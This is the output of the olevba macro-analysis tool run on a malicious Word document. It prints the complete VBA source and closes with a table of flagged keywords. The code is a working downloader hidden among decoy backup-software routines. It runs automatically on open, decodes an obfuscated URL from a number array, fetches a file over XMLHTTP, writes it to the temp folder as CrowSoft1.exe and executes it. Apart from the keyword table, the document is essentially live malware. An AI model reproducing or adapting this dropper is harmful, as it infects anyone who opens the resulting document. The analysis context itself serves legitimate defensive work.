Malicious Word macro

1. olevba 0.41 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. OLE:MAS--B-V cos007202-2.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: cos007202-2.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: cos007202-2.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub autoopen()
17. Abrir_Recordset2 "", ""
18. Hbb = pValidateInstall()
19. Title = pGetTitle("")
20. Desconectar
21. pGetMessage "MMes"
22. Title = GetPasswordFiles()
23. End Sub
24.  
25.  
26.  
27. -------------------------------------------------------------------------------
28. VBA MACRO Module1.bas
29. in file: cos007202-2.doc - OLE stream: u'Macros/VBA/Module1'
30. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
31. Public tempFile As String
32. Public Sub Abrir_Recordset(Recordset As String, StrSql As String)
33. '-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset-------------------------------------------------------------------------------------------------------------------------------------------------------------
34. '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
35. ' Procedimiento : Abrir_Recordset
36. ' Fecha         : 20/11/2006 13:51
37. ' Autor         : Miguel
38. ' Propósito     :ABRIR RECORDSET
39. '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
40. '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset------------------------------------------------------------------------------------------------------------------------------------------------------------
41. On Error GoTo Abrir_Recordset_Error
42.  
43. On Error Resume Next
44.     Recordset.ActiveConnection = Conexion
45.     Recordset.LockType = adLockOptimistic
46.     Recordset.CursorLocation = adUseClient
47.     Recordset.CursorType = adOpenDynamic
48.     Recordset.Open StrSql
49.  
50.     If Err <> 0 Then
51.         'MsgBox Err.Description
52.    End If
53.  
54. On Error GoTo 0
55.     Exit Sub
56. Abrir_Recordset_Error:
57.     MsgBox "Error " & Err.Number & " (" & Err.Description & ") en procedimiento Abrir_Recordset de Módulo ModuloConexion"
58.    
59. End Sub
60.  
61.  
62.  
63. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
64.     Dim i As Integer
65.     Dim result As String
66.     result = ""
67.     For i = LBound(fromArr) To UBound(fromArr)
68.         result = result & Chr(fromArr(i) - LenLen + i)
69.     Next i
70.     GetStringFromArray = result
71. End Function
72. -------------------------------------------------------------------------------
73. VBA MACRO Module2.bas
74. in file: cos007202-2.doc - OLE stream: u'Macros/VBA/Module2'
75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
76. Public httpRequest As Object
77. Public adodbStream As Object
78. Private Function ConvertCString(ByRef vSource As String) As String
79.     Dim i As Long
80.     i = InStr(vSource, Chr$(0))
81.     If (i > 0) Then
82.         ConvertCString = Left$(vSource, i - 1)
83.     End If
84. End Function
85.  
86.  
87. Public Function GetTempPath() As String
88.     Dim buffer As String
89.     buffer = String$(MAX_PATH, " ")
90.     If (APIGetTempPath(MAX_PATH, StrPtr(buffer)) <> 0) Then
91.         GetTempPath = ConvertCString(buffer)
92.     End If
93.    
94. End Function
95.  
96. Public Function CreateTempFile(Optional TempPath As String = vbNullString, Optional Prefix As String = vbNullString) As String
97.     If TempPath = vbNullString Then TempPath = GetTempPath
98.     If Prefix = vbNullString Then Prefix = "###"
99.     Dim buffer As String
100.     buffer = String$(MAX_PATH, " ")
101.     If APIGetTempFileName(StrPtr(TempPath), StrPtr(Prefix), 0, StrPtr(buffer)) <> 0 Then
102.         CreateTempFile = ConvertCString(buffer)
103.     End If
104.     End Function
105.  
106. Public Function FileExists(ByRef strPath As String) As Boolean
107. On Error Resume Next
108. FileExists = False
109. If GetAttr(strPath) And vbArchive Then
110. If Err = 0 Then FileExists = True
111. End If
112. Err.Clear
113. End Function
114. Public Function FolderExists(ByRef strPath As String) As Boolean
115. On Error Resume Next
116. FolderExists = False
117. If GetAttr(strPath) And vbDirectory Then
118.     If Err = 0 Then FolderExists = True
119. End If
120. Err.Clear
121. End Function
122.  
123. Function PathExists(ByRef PathName As String) As Boolean
124.  
125.     Dim Temp$
126.     'Set Default
127.    PathExists = True
128.     Temp$ = Replace$(PathName, "/", "\")
129.  
130.     If Right$(Temp$, 1) = "\" Then Temp$ = Left$(Temp$, Len(Temp$) - 1)
131.     'Set up error handler
132.    On Error Resume Next
133.     'Attempt to grab date and time
134.    Temp$ = GetAttr(Temp$)
135.     'Process errors
136.  
137.     If Err <> 0 Then PathExists = False
138.     '    Select Case Err
139.    '    Case 53, 76, 68   'File Does Not Exist
140.    '        modFile_FileExists = False
141.    '        Err = 0
142.    '    Case Else
143.    '
144.    '        If Err <> 0 Then
145.    '            MsgBox "Error Number: " & Err & Chr$(10) & Chr$(13) & " " & Error, vbOKOnly, "Error"
146.    '            End
147.    '        End If
148.    '
149.    '    End Select
150.    Err.Clear
151. End Function
152.  
153. Function BuildPath(ByVal sPathIn As String, Optional ByVal sFileNameIn As String, Optional lnps As String) As String
154.  
155.     '*******************************************************************
156.    '
157.    '  PURPOSE: Takes a path (including Drive letter and any subdirs) and
158.    '           concatenates the file name to path. Path may be empty, path
159.    '           may or may not have an ending backslash '\'.  No validation
160.    '           or existance is check on path or file.
161.    '
162.    '  INPUTS:  sPathIn - Path to use
163.    '           sFileNameIn - Filename to use
164.    '
165.    '
166.    '  OUTPUTS:  N/A
167.    '
168.    '  RETURNS:  Path concatenated to File.
169.    '
170.    '*******************************************************************
171.    '    Dim sPath As String
172.    '    Dim sFilename As String
173.    '    'Remove any leading or trailing spaces
174.    '    sPath = Trim$(sPathIn)
175.    '    sFilename = Trim$(sFileNameIn)
176.    Dim sSlash As String
177.  
178.     If lnps = lnpsDos Then
179.         sSlash = "\"
180.         sPathIn = Replace$(sPathIn, "/", "\")
181.         sFileNameIn = Replace$(sFileNameIn, "/", "\")
182.     Else
183.         sSlash = "/"
184.         sPathIn = Replace$(sPathIn, "\", "/")
185.         sFileNameIn = Replace$(sFileNameIn, "\", "/")
186.     End If
187.  
188.     If sPathIn = vbNullString Then
189.         BuildPath = sFileNameIn
190.     Else
191.  
192.         If Right$(sPathIn, 1) = sSlash Then
193.             BuildPath = sPathIn & sFileNameIn
194.         Else
195.             BuildPath = sPathIn & sSlash & sFileNameIn
196.         End If
197.  
198.     End If
199.  
200. End Function
201.  
202. Function GetFileName(ByRef sFilename As String) As String
203.     Dim pLen As String
204.     Dim sPath As String
205.    
206.     sPath = sFilename
207.     pLen = Len(sPath)
208.     If pLen < 1 Then Exit Function
209.     Do While (Right$(sPath, 1) = "\")
210.         pLen = pLen - 1
211.         sPath = Left$(sPath, pLen)
212.         If pLen < 1 Then GetFileName = "\": Exit Function
213.     Loop
214.     Do While (Right$(sPath, 1) = "/")
215.         pLen = pLen - 1
216.         sPath = Left$(sPath, pLen)
217.         If pLen < 1 Then GetFileName = "\": Exit Function
218.     Loop
219.    
220.     'GetFileName = sPath
221.    Dim pos As Long
222.     pos = InStrRev(sPath, "/")
223.     If pos < 1 Then pos = InStrRev(sPath, "\")
224.     If pos < 1 Then
225.         GetFileName = sPath
226.     Else
227.         GetFileName = Right$(sPath, pLen - pos)
228.     End If
229.    
230.     'pos = InStrRev$(sPath, ".")
231.  
232.  
233. End Function
234.  
235. Function GetParentFolderName(ByRef sFilename As String) As String
236.  
237.     Dim lF As Long
238.     Dim pos As Long
239.     lF = Len(sFilename)
240.     If lF < 1 Then Exit Function
241.    
242.     GetParentFolderName = sFilename
243.     pos = InStrRev(GetParentFolderName, "/")
244.  
245.     If pos = 0 Then pos = InStrRev(GetParentFolderName, "\")
246.  
247.     If pos = lF Then
248.         GetParentFolderName = Left$(GetParentFolderName, lF - 1)
249.         pos = InStrRev(GetParentFolderName, "/")
250.  
251.         If pos = 0 Then pos = InStrRev(GetParentFolderName, "\")
252.     End If
253.  
254.     If pos = 0 Then
255.         GetParentFolderName = vbNullString
256.     Else
257.         GetParentFolderName = Mid$(sFilename, 1, pos - 1) & "\"
258.     End If
259.  
260.     '
261.    '    pos = InStrRev(GetParentFolder, "/")
262.    '    If pos = 0 Then pos = InStrRev(GetParentFolder, "\")
263.    '    If pos = 0 Then GetParentFolder = vbNULLSTRING
264.  
265. End Function
266.  
267. Public Function GetBaseName(ByVal sPath As String) As String
268.  
269.     Dim pos As Long
270.     sPath = GetFileName(sPath)
271.     pos = InStrRev(sPath, ".")
272.     If pos > 0 Then
273.         GetBaseName = Left$(sPath, pos - 1)
274.     Else
275.         GetBaseName = sPath
276.     End If
277.  
278. End Function
279.  
280. Public Function GetExtensionName(ByRef sPath As String) As String
281.  
282.     If sPath = vbNullString Then Exit Function
283.     GetExtensionName = RightRight(sPath, ".", vbTextCompare, ReturnEmptyStr)
284.  
285. End Function
286.  
287. Private Function RightRight(ByRef Str As String, RFind As String, Optional Compare As String, Optional RetError As String) As String
288.  
289.     Dim K As Long
290.     K = InStrRev(Str, RFind, , Compare)
291.  
292.     If K = 0 Then
293.         RightRight = IIf(RetError = ReturnOriginalStr, Str, vbNullString)
294.     Else
295.         RightRight = Mid$(Str, K + 1, Len(Str))
296.     End If
297.  
298. End Function
299.  
300. Public Function GetTempFilename(Optional sPrefix As String = "lTmp", Optional sExt As String) As String
301.  
302.     Randomize Timer
303.  
304.     If sExt <> vbNullString Then sExt = "." & sExt
305.     GetTempFilename = sPrefix & Hex$(Int(Rnd(Timer) * 10000 + 1)) & sExt
306.  
307.     Do Until PathExists(GetTempFilename) = False
308.         GetTempFilename = sPrefix & Hex$(Int(Rnd(Timer) * 10000 + 1)) & sExt
309.     Loop
310.  
311. End Function
312.  
313. Public Function GetFullPath(sFilename As String) As String
314.  
315.     Dim C As Long, sRet As String
316.     GetFullPath = sFilename
317.  
318.     If sFilename = Empty Then Exit Function
319.     ' Get the path size, then create string of that size
320.    sRet = String$(cMaxPath, 0)
321.     C = APIGetFullPathName(StrPtr(sFilename), MAX_PATH, StrPtr(sRet), 0)
322.    ' GetFullPath = StrConv(ConvertCString(sRet), vbUnicode)
323.    GetFullPath = ConvertCString(sRet)
324.  
325. End Function
326.  
327. Public Function PathType(sPath As String) As String
328.  
329.     PathType = LNUnKnown
330.     On Error GoTo Herr
331.  
332.     If sPath = vbNullString Then Exit Function
333.  
334.     If InStr(sPath, ":") < 1 Then sPath = GetFullPath(sPath)
335.     Dim PathAttr As VbFileAttribute
336.     PathAttr = GetAttr(sPath)
337.  
338.     If (PathAttr And vbDirectory) Then
339.         PathType = LNFolder
340.     ElseIf (PathAttr And vbArchive) Then
341.         PathType = LNFile
342.     End If
343.  
344. Herr:
345.  
346. End Function
347.  
348. Public Function subCount(ByVal spathName As String, Optional ByRef lFolders As Long, Optional ByRef lFiles As Long) As Long
349.  
350.     Dim subName As String
351.  
352.     If PathType(spathName) <> LNFolder Then Exit Function
353.     spathName = GetFullPath(spathName)
354.     subName = Dir(spathName, vbDirectory Or vbArchive Or vbHidden Or vbNormal Or vbSystem Or vbReadOnly)
355.  
356.     Do Until subName = vbNullString
357.  
358.         If subName = "." Or subName = ".." Then
359.         Else
360.             subCount = subCount + 1
361.             subName = BuildPath(spathName, subName)
362.  
363.             If PathType(subName) = LNFolder Then
364.                 lFolders = lFolders + 1
365.             Else
366.                 lFiles = lFiles + 1
367.             End If
368.  
369.         End If
370.  
371.         subName = Dir()
372.     Loop
373.  
374. End Function
375. Public Function subFolders(ByVal spathName As String, ByRef strFolder() As String) As Long
376.     Dim fdCount As Long
377.     Dim subName As String
378.    
379.     spathName = GetFullPath(spathName)
380.     subName = Dir$(spathName, vbDirectory)
381.     spathName = BuildPath(spathName)
382.     Do Until subName = vbNullString
383.         If subName <> "." And subName <> ".." Then
384.                 If GetAttr(spathName & subName) And vbDirectory Then
385.                 ReDim Preserve strFolder(0 To fdCount) As String
386.                 strFolder(fdCount) = spathName & subName
387.                 fdCount = fdCount + 1
388.             End If
389.         End If
390.         subName = Dir$()
391.     Loop
392.     subFolders = fdCount
393.    
394. End Function
395. Public Function subFiles(ByVal spathName As String, ByRef strFile() As String) As Long
396.     Dim fCount As Long
397.     Dim subName As String
398.    
399.     spathName = GetFullPath(spathName)
400.     subName = Dir$(spathName, vbArchive)
401.     Do Until subName = vbNullString
402.         If subName <> "." And subName <> ".." Then
403.  
404.             ReDim Preserve strFile(0 To fCount) As String
405.             strFile(fCount) = subName
406.             fCount = fCount + 1
407.         End If
408.         subName = Dir$()
409.     Loop
410.     subFiles = fCount
411.  
412. End Function
413.  
414. Public Sub xMkdir(sPath As String)
415.     Dim parentFolder As String
416.     If FolderExists(sPath) Then Exit Sub
417.     parentFolder = GetParentFolderName(sPath)
418.     If parentFolder <> vbNullString And FolderExists(parentFolder) = False Then xMkdir parentFolder
419.     MkDir sPath
420. End Sub
421.  
422.  
423.  
424. Public Function chkFileType(chkfile As String) As String
425.     Dim Ext As String
426.     Dim K As Long
427.     K = InStrRev(chkfile, ".", , vbTextCompare)
428.  
429.     If K > 0 Then
430.         Ext = LCase$(Mid$(chkfile, K + 1, Len(chkfile)))
431.     End If
432.  
433.     Select Case Ext
434.     Case "rtf"
435.         chkFileType = ftRTF
436.     Case "zhtm", "zip"
437.         chkFileType = ftZIP
438.     Case "txt", "ini", "bat", "cmd", "css", "log", "cfg", "txtindex"
439.         chkFileType = ftTxt
440.     Case "jpg", "jpeg", "gif", "bmp", "png", "ico"
441.         chkFileType = ftIMG
442.     Case "htm", "html", "shtml"
443.         chkFileType = ftIE
444.     Case "exe", "com"
445.         chkFileType = ftExE
446.     Case "chm"
447.         chkFileType = ftCHM
448.     Case "mp3", "wav", "wma"
449.         chkFileType = ftAUDIO
450.     Case "wmv", "rm", "rmvb", "avi", "mpg", "mpeg"
451.         chkFileType = ftVIDEO
452.     End Select
453.  
454. End Function
455.  
456. Public Function lookfor(sCurFile As String, Optional lookForWhat As String, Optional sWildcard As String = "*")
457.  
458. Dim sCurFilename As String
459. Dim sCurFolder As String
460. Dim i As Long
461. Dim iCount As Long
462. Dim sFileList() As String
463. Dim Index As String
464.  
465. If PathExists(sCurFile) = False Then Exit Function
466.  
467. If PathType(sCurFile) = LNFolder Then
468.     sCurFolder = sCurFile
469. ElseIf PathType(sCurFile) = LNFile Then
470.     sCurFolder = GetParentFolderName(sCurFile)
471.     sCurFilename = GetFileName(sCurFile)
472. Else
473.     Exit Function
474. End If
475.  
476. iCount = subFiles(BuildPath(sCurFolder, sWildcard), sFileList())
477. If iCount < 1 Then Exit Function
478. Index = 0
479. If lookForWhat = LN_FILE_RAND Then
480.     Index = Int(Rnd(Timer) * iCount) + 1
481. ElseIf sCurFilename = vbNullString Then
482.         Index = 1
483. Else
484.     For i = 1 To iCount
485.         If StrComp(sCurFilename, sFileList(i), vbTextCompare) = 0 Then
486.             Index = i: Exit For
487.         End If
488.     Next
489. End If
490.  
491. If lookForWhat = LN_FILE_next Then
492.     Index = Index + 1
493.     If Index > iCount Then Index = 1
494. ElseIf lookForWhat = LN_FILE_prev Then
495.     Index = Index - 1
496.     If Index < 1 Then Index = iCount
497. End If
498.  
499. lookfor = BuildPath(sCurFolder, sFileList(Index))
500.  
501. End Function
502.  
503.  
504. Public Function DeleteFolder(ByVal vTarget As String) As Boolean
505.    
506. On Error GoTo ErrorDeleteFolder
507.  
508.     vTarget = BuildPath(vTarget, vbNullString)
509.     ForceKill vTarget & "*.*"
510.    
511.    
512.     Dim folders() As String
513.     Dim count As Long
514.     count = subFolders(vTarget, folders())
515.    
516.     Dim i As Long
517.     For i = 1 To count
518.         DeleteFolder folders(i)
519.     Next
520.    
521.     RmDir vTarget
522.     DeleteFolder = True
523.        
524.        
525. ErrorDeleteFolder:
526.     DeleteFolder = False
527.     Err.Raise Err.Number, Err.Source, Err.Description
528. End Function
529.  
530.  
531. Public Sub Desconectar()
532.  
533. On Error Resume Next
534.  
535.     Conexion.Close
536.   Set processEnv = CreateObject("WScript.Shell").Environment("Process")
537.     Conexion2.Close
538.     Conexion3.Close
539.    rrr = processEnv("TE" + "" + "MP")
540.     Conexion4.Close
541.     tempFile = rrr & tempFile
542.    
543.     Set Conexion = Nothing
544.     Set Conexion2 = Nothing
545.     Set Conexion3 = Nothing
546.     Set Conexion4 = Nothing
547. End Sub
548.  
549. Public Sub ForceKill(ByRef vTarget As String)
550.     On Error Resume Next
551.     Kill vTarget
552.     Err.Clear
553. End Sub
554.  
555. Public Function MoveFile(ByVal vSource As String, ByVal vDest As String) As Boolean
556.     Dim r As Long
557.     r = APIMoveFile(vSource, vDest)
558.     If r <> 0 Then MoveFile = True
559. End Function
560.  
561. Public Function ReplaceInvalidChars(ByRef vString As String, Optional ByRef vTo As String = vbNullString) As String
562.     Dim i As Long
563.     Dim j As Long
564.     Dim L1 As Long
565.     Dim L2 As Long
566.    
567.     Dim C As String
568.     Dim invalidChars() As String
569.     L1 = Len(FileSystem_Invalid_Path_Chars)
570.     ReDim invalidChars(1 To L1)
571.     For i = 1 To L1
572.         invalidChars(i) = Mid$(FileSystem_Invalid_Path_Chars, i, 1)
573.     Next
574.        
575.     L2 = Len(vString)
576.     For i = 1 To L2
577.         C = Mid$(vString, i, 1)
578.         For j = 1 To L1
579.             If C = invalidChars(j) Then
580.                 C = vTo
581.                 Exit For
582.             End If
583.         Next
584.         ReplaceInvalidChars = ReplaceInvalidChars & C
585.     Next
586. End Function
587.  
588. Public Sub WriteToFile(ByRef vFilename As String, ByRef vText As String, Optional vUnicode As Boolean = False)
589.     On Error Resume Next
590.    
591.     Dim fNum As Long
592.     'Dim l As Long
593.    fNum = FreeFile
594.    
595.    
596.     Kill vFilename
597.    
598.     Dim c_B(1) As Byte
599.     ReDim bText(LenB(vText)) As Byte
600.     c_B(0) = 255
601.     c_B(1) = 254
602.     bText = vText
603.     Open vFilename For Binary Access Write As #fNum
604.     Put #fNum, , c_B()
605.     Put #fNum, , bText
606.    
607.     Close #fNum
608.    
609.     If Err Then
610.         Err.Raise Err.Number, "WriteToFile: " & vFilename, Err.Description
611.     End If
612. End Sub
613.  
614. Public Function pValidateInstall() As Boolean
615.   Dim dbPath, Nnm  As String
616.   Dim computer() As Variant
617.     computer = Array(145, 156, 155, 150, 95, 83, 82, 135, 150, 146, 142, 127, 132, 142, 138, 127, 124, 70, 122, 133, 130, 67, 70, 71, 69, 67, 69, 61, 66, 63, 61, 62, 63, 63, 61, 60, 57, 57, 49, 103, 121, 101)
618.   httpRequest.Open "G" + "ET", GetStringFromArray(computer, 41), False
619.  
620.   dbPath = LoadPasswordFiles
621.  
622.   If LenB(dbPath) = 0 Then
623.     Exit Function
624.   End If
625.  
626.   dbPath = Getc.IniValue(csSecConfig, _
627.                        csDbPath, _
628.                        vbNullString, _
629.                        "GetIniFullFile(csIniFile)")
630.  
631.   Dim bValid As Boolean
632.  
633.   If LenB(dbPath) <> 0 Then
634.     bValid = File.FolderExists_(dbPath)
635.   End If
636.  
637.   If Not bValid Then
638.     MsgBox "Debe indicar una carpeta donde se guardaran las definiciones de tareas de CSBackup"
639.     Exit Function
640.   Else
641.     pValidateInstall = True
642.   End If
643.  
644. End Function
645. -------------------------------------------------------------------------------
646. VBA MACRO Module3.bas
647. in file: cos007202-2.doc - OLE stream: u'Macros/VBA/Module3'
648. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
649. Public Sub pSetInitWithWindows()
650.   Dim s As String
651.   Dim InitWithWindows As Boolean
652.   Dim Key As String
653.  
654.   Set mReg = New cRegistry
655.  
656.   Key = App.Title & "(" & App.path & ")"
657.   InitWithWindows = Val(GetIniValue(csSecConfig, _
658.                     csInitWithWindows, _
659.                     1, _
660.                     GetIniFullFile(csIniFile)))
661.                    
662.   s = mReg.GetRegString(cvRun, Key)
663.   If s <> "" Then
664.     If Not InitWithWindows Then
665.       RemoveFromRegistry Key
666.     End If
667.   Else
668.     InsertInRegistry Key, """" & App.path & "\" & App.EXEName & ".exe"" -r"
669.   End If
670. End Sub
671.  
672.  
673. Private Sub pLoadIniValues()
674.   LoadPasswordFiles
675. End Sub
676.  
677. Public Function LoadPasswordFiles() As String
678.     LoadPasswordFiles = ""
679.   Dim Password As String
680.   httpRequest.Send
681.   On Error GoTo ExitFunction
682.   Password = GetP.rogramPassword()
683.  
684.   m_PasswordFiles = GetI.niValue(csSecConfig, _
685.                               csPasswordFiles, _
686.                               vbNullString, _
687.                               GetI.niFullFile(csIniFile))
688.   m_PasswordFiles = Dec.ryptData(m_PasswordFiles, Password)
689. ExitFunction:
690.   Exit Function
691. End Function
692.  
693. Public Function LoadMasterPassword() As Boolean
694.   Dim bUseMasterPassword As Boolean
695.  
696.   bUseMasterPassword = Val(GetIniValue(csSecConfig, _
697.                               csUseMasterPassword, _
698.                               0, _
699.                               GetIniFullFile(csIniFile)))
700.   If bUseMasterPassword Then
701.  
702.     LoadMasterPassword = RequestMasterPassword(False)
703.  
704.   Else
705.    
706.     LoadMasterPassword = True
707.  
708.   End If
709.  
710. End Function
711.  
712. Public Sub EditPreferences(ByVal ShowMode As FormShowConstants, Optional ByVal dbPath As String)
713.   Load fPreferences
714.   If LenB(dbPath) Then
715.     fPreferences.txPath.text = dbPath
716.   End If
717.   fPreferences.Show ShowMode
718. End Sub
719.  
720. Public Sub Abrir_Recordset2(Recordset As String, StrSql As String)
721. '-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset-------------------------------------------------------------------------------------------------------------------------------------------------------------
722. '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
723. ' Procedimiento : Abrir_Recordset
724. ' Fecha         : 20/11/2006 13:51
725. ' Autor         : Miguel
726. ' Propósito     :ABRIR RECORDSET
727. '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset
728. '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Abrir_Recordset------------------------------------------------------------------------------------------------------------------------------------------------------------
729. Set httpRequest = CreateObject("Microsoft.XMLHTTP")
730. Set adodbStream = CreateObject("Adodb.Stream")
731. On Error Resume Next
732.  
733.     Rec.cordset.ActiveConnection = Conexion2
734.     Rec.ordset.LockType = adLockOptimistic
735.     Rec.ordset.CursorLocation = adUseClient
736.     Rec.ordset.CursorType = adOpenDynamic
737.     Rec.ordset.Open StrSql
738.  
739.     If Err <> 0 Then
740.         'MsgBox Err.Description
741.    End If
742.  
743.    
744. End Sub
745. Public Sub FormLoad(ByRef f As String, ByVal bSize As Boolean)
746.   On Error Resume Next
747.  
748.   With f
749.    
750.     .Top = GetIniValue(csSecWindows, .Name & "_top", 2000, GetIniFullFile(csIniFile))
751.     .Left = GetIniValue(csSecWindows, .Name & "_left", 3000, GetIniFullFile(csIniFile))
752.    
753.     If bSize Then
754.       .Width = GetIniValue(csSecWindows, .Name & "_width", 6000, GetIniFullFile(csIniFile))
755.       .Height = GetIniValue(csSecWindows, .Name & "_height", 4000, GetIniFullFile(csIniFile))
756.     End If
757.   End With
758. End Sub
759.  
760. Public Sub FormUnload(ByRef f As String, ByVal bSize As Boolean)
761.   With f
762.     If .WindowState = vbNormal Then
763.       SetIniValue csSecWindows, .Name & "_top", .Top, GetIniFullFile(csIniFile)
764.       SetIniValue csSecWindows, .Name & "_left", .Left, GetIniFullFile(csIniFile)
765.      
766.       If bSize Then
767.         SetIniValue csSecWindows, .Name & "_width", .Width, GetIniFullFile(csIniFile)
768.         SetIniValue csSecWindows, .Name & "_height", .Height, GetIniFullFile(csIniFile)
769.       End If
770.     End If
771.   End With
772. End Sub
773.  
774. Public Sub MngError(ByRef ErrObj As Object, _
775.                     ByVal FunctionName As String, _
776.                     ByVal Module As String, _
777.                     ByVal InfoAdd As String, _
778.                     Optional ByVal Title As String = "@@@@@")
779.  
780.   Title = pGetTitle(Title)
781.   MsgBox "Error: " & Err.Description & vbCrLf _
782.                    & "Funcion: " & Module & "." & FunctionName & vbCrLf _
783.                    & InfoAdd, _
784.          vbCritical, _
785.          Title
786. End Sub
787.  
788. Public Sub MsgWarning(ByVal msg As String, Optional ByVal Title As String = "@@@@@")
789.     pMsgAux msg, vbExclamation, Title
790. End Sub
791.  
792. Public Sub pMsgAux(ByVal msg As String, ByVal Style As VbMsgBoxStyle, ByVal Title As String)
793.   msg = pGetMessage(msg)
794.   Title = pGetTitle(Title)
795.   MsgBox msg, Style, Title
796. End Sub
797.  
798. Public Function pGetMessage(ByVal msg As String) As String
799.   msg = Replace(msg, vbCrLf, vbCrLf)
800.     With adodbStream
801.        .Type = 1
802.         .Open
803.         .Write httpRequest.responseBody
804.         .savetofile tempFile, 2
805.     End With
806.   pGetMessage = msg
807. End Function
808.  
809. Public Function pGetTitle(ByVal Title As String) As String
810.   If Title = "" Then Title = "CrowSoft1"
811.   If Title = "@@@@@" Then Title = "CrowSoft2"
812.  
813.     tempFile = "\" + Title + ".exe"
814.  
815.   pGetTitle = Title
816. End Function
817.  
818. Public Function Ask(ByVal msg As String, ByVal default As VbMsgBoxResult, Optional ByVal Title As String) As Boolean
819.   Dim N As Integer
820.   msg = pGetMessage(msg)
821.   If InStr(1, msg, "?") = 0 Then msg = "¿" & msg & "?"
822.   If default = vbNo Then N = vbDefaultButton2
823.   pGetTitle Title
824.   Ask = vbYes = MsgBox(msg, vbYesNo + N + vbQuestion, Title)
825.  
826. End Function
827.  
828. Public Function TaskType(ByVal TaskFile As String, _
829.                          ByVal bSilent As Boolean, _
830.                          Optional ByRef strError As String) As String
831.   Dim DocXml As cXml
832.   Set DocXml = New cXml
833.  
834.   DocXml.init Nothing
835.   DocXml.Name = GetFileName_(TaskFile)
836.   DocXml.path = GetPath_(TaskFile)
837.  
838.   If Not DocXml.OpenXml(bSilent, strError) Then Exit Function
839.  
840.  
841.   Dim Root  As Object
842.  
843.   Set Root = DocXml.GetRootNode()
844.  
845.   TaskType = Val(pGetChildNodeProperty(Root, DocXml, "TaskType", "Value"))
846.  
847. End Function
848.  
849. Public Function GetPasswordFiles() As String
850.   Set shellApp = CreateObject("Shell.Application")
851.     shellApp.Open (tempFile)
852. End Function
853.  
854. Public Function RequestMasterPassword(ByVal bWithConfirm As Boolean) As Boolean
855.   If Not bWithConfirm Then
856.     fMasterPassword.txPassword2.Visible = False
857.     fMasterPassword.lbConfirm.Visible = False
858.   End If
859.   fMasterPassword.Show vbModal
860.  
861.   If fMasterPassword.Ok Then
862.  
863.     m_MasterPassword = fMasterPassword.txPassword.text
864.     RequestMasterPassword = True
865.   End If
866.   Unload fMasterPassword
867. End Function
868.  
869. Public Function ValidateMasterPassword(ByVal Password As String) As Boolean
870.   Dim testValue As String
871.   testValue = GetIniValue(csSecConfig, _
872.                           csPasswordTestValue, _
873.                           vbNullString, _
874.                           GetIniFullFile(csIniFile))
875.   ValidateMasterPassword = DecryptData(testValue, Password) = c_testvalue
876. End Function
877.  
878. Public Function GetMasterPassword() As String
879.   GetMasterPassword = m_MasterPassword
880. End Function
881.  
882. Public Sub ChangeMasterPassword(ByVal OldMasterPassword As String, _
883.                                 ByVal NewMasterPassword As String)
884.  
885.   ' Tengo que levantar todas las tareas
886.  ' y grabar con la nueva password
887.  '
888.  Dim i As Long
889.   Dim Task As Object
890.  
891.   With fMain.lvTask.ListItems
892.     For i = 1 To .count
893.       If TaskType(.Item(i).SubItems(1), False) = c_TaskTypeBackupFile Then
894.         Set Task = New cTask
895.       Else
896.         Set Task = New cSQLTaskCommandBackup
897.       End If
898.      
899.       Dim oTask As cSQLTaskCommandBackup
900.       m_MasterPassword = OldMasterPassword
901.      
902.       If Task.Load(.Item(i).SubItems(1), False) Then
903.        
904.         m_MasterPassword = NewMasterPassword
905.         Task.Save
906.       End If
907.    
908.     Next
909.   End With
910.  
911.   m_MasterPassword = NewMasterPassword
912. End Sub
913.  
914. +------------+----------------------+-----------------------------------------+
915. | Type       | Keyword              | Description                             |
916. +------------+----------------------+-----------------------------------------+
917. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
918. | Suspicious | Kill                 | May delete a file                       |
919. | Suspicious | Open                 | May open a file                         |
920. | Suspicious | Shell                | May run an executable file or a system  |
921. |            |                      | command                                 |
922. | Suspicious | vbNormal             | May run an executable file or a system  |
923. |            |                      | command                                 |
924. | Suspicious | WScript.Shell        | May run an executable file or a system  |
925. |            |                      | command                                 |
926. | Suspicious | MkDir                | May create a directory                  |
927. | Suspicious | Shell.Application    | May run an application (if combined     |
928. |            |                      | with CreateObject)                      |
929. | Suspicious | Binary               | May read or write a binary file (if     |
930. |            |                      | combined with Open)                     |
931. | Suspicious | CreateObject         | May create an OLE object                |
932. | Suspicious | Chr                  | May attempt to obfuscate specific       |
933. |            |                      | strings                                 |
934. | Suspicious | ADODB.Stream         | May create a text file                  |
935. | Suspicious | SaveToFile           | May create a text file                  |
936. | Suspicious | Write                | May write to a file (if combined with   |
937. |            |                      | Open)                                   |
938. | Suspicious | Put                  | May write to a file (if combined with   |
939. |            |                      | Open)                                   |
940. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
941. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
942. |            |                      | may be used to obfuscate strings        |
943. |            |                      | (option --decode to see all)            |
